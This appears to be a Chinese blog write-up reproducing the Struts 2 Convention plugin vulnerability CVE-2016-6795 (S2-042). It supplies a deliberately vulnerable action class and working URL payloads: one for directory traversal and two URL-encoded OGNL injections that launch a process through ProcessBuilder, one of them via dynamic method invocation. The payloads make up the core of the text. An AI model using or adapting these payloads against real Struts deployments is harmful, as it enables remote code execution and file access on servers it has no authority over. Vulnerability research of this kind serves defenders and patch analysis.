020-(CVE-2016-6795)s2-042

# (CVE-2016-6795)s2-042

## 一、漏洞简介

在进行struts2开发时,需要在配置文件(struts.xml)中写一个个action,和对应返回结果的result(可以理解为前端返回的jsp文件)。
但是,写的action多了,配置起来就显得特别繁琐了。struts2 Convention插件可以完全抛弃配置,也就是约定优于配置
通过这个插件来实现目录的遍历

## 二、漏洞影响

Struts 2.3.20 – Struts 2.3.31

## 三、复现过程

1. 测试环境搭建

* **(1)**struts版本: struts2.3.24.1

* **(2)**convention插件版本: struts2-convention-plugin-2.3.24.1

将`struts2-convention-plugin-2.3.24.1.jar`复制到`/WEB-INF/lib`目录下。

1. 样例代码

新建一个GoAction类,放在`action`包下(`convention`插件的默认约定位置)。

“`java
package action;

import com.opensymphony.xwork2.ActionSupport;

public class GoAction extends ActionSupport {

private String go;
private String methodToOGNL;

public String execute(){
return go; //方法的返回值,即为resultCode
}

public String getGo() {
return go;
}
public void setGo(String go) {
this.go = go;
}
public String getMethodToOGNL() {
return methodToOGNL;
}
public void setMethodToOGNL(String methodToOGNL) {
this.methodToOGNL = methodToOGNL;
}
}

“`

在`/WEB-INF/content`目录下,新建一个`admin.jsp`:

“`
Hello Admin~~

“`

1. 攻击和调试分析

上述代码目的是,让`GoAction`起到一个跳转功能。

当`admin用户`经过验证,需要跳转到`jsp`页面时。 直接访问`url`:`/go?go=admin`,此时的`resultCode`为`admin`。 通过`convention`插件,会在`/WEB-INF/content`找到`admin.jsp`,返回给用户。

![1.png](/static/lingzu/images/f862733576694b19bf1a5ebb883cb1f4.png)
此时,我们就可以通过`go`参数来控制`resultCode`。

**(1) 遍历目录读取文件**

不防先试试跨目录。测试Payload为:

“`
http://baidu.com:8080/MyStruts2Test/go?go=../content/admin

“`

这样也成功找到了`admin.jsp`。

然后,在`/WEB-INF/`下新建一个`hack.jsp文件`。简单的跨目录读取成功:

![1.png](/static/lingzu/images/f328cf65292c441bad7bb27d747de11d.png)
**(2)执行任意代码**

在补丁分析时,我们看到修补了一个`Result`执行命令。于是,我们可以在`resultCode`中嵌入`ognl`代码试试~ 我们最后要找到`admin.jsp`文件,于是在路径中嵌入了如下Payload:

“`
http://www.baidu.com:8080/MyStruts2Test/go?go=%24%7B%23_memberAccess%5B%22excludedClasses%22%5D%3D%7B1%7D%2Cnew%20java.lang.ProcessBuilder%28%27calc%27%29.start%28%29%7D%2f..%2fadmin

“`

打断点分析可以看到:

![1.png](/static/lingzu/images/c9049c5f62a74f8c922a293f3d3b45a2.png)

找到`admin.jsp`文件后的Result为`org.apache.struts2.dispatcher.ServletDispatcherResult`对象,并且`parse`属性为true。`location`属性中带有OGNL语句,和S2-016漏洞一样,成功运行植入的代码,弹出计算器:

![2.png](/static/lingzu/images/7c9ab4df0cd048b18733233d0d43f3d1.png)

**(3)另一种控制`resultCode`方法**

可能注意到了`methodToOGNL`这个变量没有用,当我们可以选择调用`action`的某个方法时,比如还有最近出现的`rest`插件或者打开`动态方法调用`:

“`

“`

于是就有了如下payload:

“`bash
http://www.baidu.com:8080/MyStruts2Test/go!getMethodToOGNL?methodToOGNL=%24%7B%23_memberAccess%5B%22excludedClasses%22%5D%3D%7B1%7D%2Cnew%20java.lang.ProcessBuilder%28%27calc%27%29.start%28%29%7D%2f..%2fadmin

“`

我调用了`getMethodToOGNL`方法,返回`methodToOGNL`变量的值。就能简接控制`resultCode`了。当然成功弹出计算器。这种情况,相比前面的情况。恐怕就要普遍些了吧~

**条件: 只需`action`中有个`String`变量即可。**

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容